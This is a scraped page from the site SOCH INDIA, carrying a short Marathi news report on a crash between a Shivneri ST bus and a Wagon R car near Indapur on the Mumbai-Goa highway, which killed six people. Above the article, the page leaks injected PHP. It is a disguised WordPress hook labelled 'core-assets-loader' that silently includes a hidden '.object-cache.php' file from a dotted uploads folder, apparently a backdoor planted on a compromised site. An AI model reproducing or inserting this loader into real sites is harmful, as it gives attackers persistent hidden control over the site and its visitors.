add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबई-गोवा हायवेवर भीषण अपघात, 6 प्रवाशांचा मृत्यू – SOCH INDIA
Menu

अपराध समाचार
मुंबई-गोवा हायवेवर भीषण अपघात, 6 प्रवाशांचा मृत्यू

nobanner

मुंबई-गोवा हायवेवर भीषण अपघात, 6 प्रवाशांचा मृत्यू

इंदापूर (रायगड) : मुंबई-गोवा हायवेवर भीषण अपघात झाला आहे. रायगडमधील इंदापूरजवळ हा अपघात झाला असून, या भीषण अपघातात 6 प्रवाशांचा मृत्यू झाला आहे.

शिवनेरी एसटी बस आणि वॅगन आर कारचा अपघात पहाटे 5 च्या सुमारास झाल्याची माहिती मिळते आहे.

या अपघातात 6 जणांचा मृत्यू, तर एक जण जखमी झाला आहे.

मुंबईहून कोकणात जाणाऱ्या कारने शिवनेरी एसटीला ओव्हरटेक करताना हा भीषण अपघात झाल्याची प्राथमिक माहिती मिळते आहे.